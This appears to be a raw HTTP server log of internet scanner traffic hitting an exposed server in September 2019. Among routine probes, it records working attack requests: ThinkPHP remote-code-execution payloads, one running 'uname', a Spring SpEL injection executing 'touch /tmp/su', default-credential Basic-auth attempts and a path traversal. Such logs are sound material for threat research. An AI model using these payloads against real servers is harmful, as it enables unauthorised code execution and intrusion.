User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Content-Length: 0
91.108.156.233 - - [11/Sep/2019 21:07:34] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Accept-Encoding: identity
Host: 157.245.46.181
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
66.240.205.34 - - [11/Sep/2019 21:51:22] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /robots.txt
Headers:
Host: 157.245.46.181:8080
Accept-Encoding: identity
66.240.205.34 - - [11/Sep/2019 21:51:22] "GET /robots.txt HTTP/1.1" 200 -
INFO:root:GET request,
Path: /sitemap.xml
Headers:
Host: 157.245.46.181:8080
Accept-Encoding: identity
66.240.205.34 - - [11/Sep/2019 21:51:22] "GET /sitemap.xml HTTP/1.1" 200 -
INFO:root:GET request,
Path: /.well-known/security.txt
Headers:
Host: 157.245.46.181:8080
Accept-Encoding: identity
66.240.205.34 - - [11/Sep/2019 21:51:23] "GET /.well-known/security.txt HTTP/1.1" 200 -
INFO:root:GET request,
Path: /favicon.ico
Headers:
Host: 157.245.46.181:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.13.0
66.240.205.34 - - [11/Sep/2019 21:51:23] "GET /favicon.ico HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
202.84.77.238 - - [11/Sep/2019 22:39:06] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Connection: keep-alive
122.228.19.79 - - [11/Sep/2019 22:55:48] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, identity
Accept-Language: en-US;q=0.6,en;q=0.4
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
194.61.24.189 - - [11/Sep/2019 23:18:33] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /HNAP1/
Headers:
Host: 157.245.46.181:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, identity
Accept-Language: en-US;q=0.6,en;q=0.4
Referer: http://157.245.46.181:8080/
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
194.61.24.189 - - [11/Sep/2019 23:18:33] "GET /HNAP1/ HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0
Accept-Encoding: gzip
Connection: close
139.162.79.87 - - [11/Sep/2019 23:43:53] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
184.105.139.68 - - [12/Sep/2019 00:02:39] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 216.218.206.68
X-Forwarded-For: 216.218.206.68
X-Forwarded-Proto: https
Connection: close
127.0.0.1 - - [12/Sep/2019 00:11:30] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
86.58.116.43 - - [12/Sep/2019 00:44:06] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
39.135.1.156 - - [12/Sep/2019 01:02:23] "GET /TP/public/index.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
39.135.1.156 - - [12/Sep/2019 01:02:24] "GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 -
INFO:root:POST request,
Path: /TP/public/index.php?s=captcha
Headers:
Host: 157.245.46.181:8080
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
39.135.1.156 - - [12/Sep/2019 01:02:24] "POST /TP/public/index.php?s=captcha HTTP/1.1" 200 -
INFO:root:POST request,
Path: /users?page=&size=5
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 119
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=
39.135.1.156 - - [12/Sep/2019 01:02:25] "POST /users?page=&size=5 HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
39.135.1.156 - - [12/Sep/2019 01:02:25] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
178.93.18.164 - - [12/Sep/2019 01:56:47] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
103.47.219.149 - - [12/Sep/2019 02:14:14] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
92.39.54.176 - - [12/Sep/2019 05:11:59] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin-scripts.asp
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 157.245.46.181
Authorization: Basic YWRtaW46YWRtaW4=
101.132.148.50 - - [12/Sep/2019 07:29:19] "GET /admin-scripts.asp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin-scripts.asp
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 157.245.46.181
Authorization: Basic cm9vdDphZG1pbg==
101.132.148.50 - - [12/Sep/2019 07:29:20] "GET /admin-scripts.asp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
191.205.92.242 - - [12/Sep/2019 08:03:33] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Connection: keep-alive
Accept-Encoding: gzip,deflate
92.119.160.10 - - [12/Sep/2019 08:18:16] "GET / HTTP/1.1" 200 -
113.173.230.35 - - [12/Sep/2019 08:18:32] code 400, message Bad request version ('HTTP')
113.173.230.35 - - [12/Sep/2019 08:18:32] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: HTTP Banner Detection (https://security.ipip.net)
Connection: close
139.162.111.98 - - [12/Sep/2019 09:21:08] "GET / HTTP/1.1" 200 -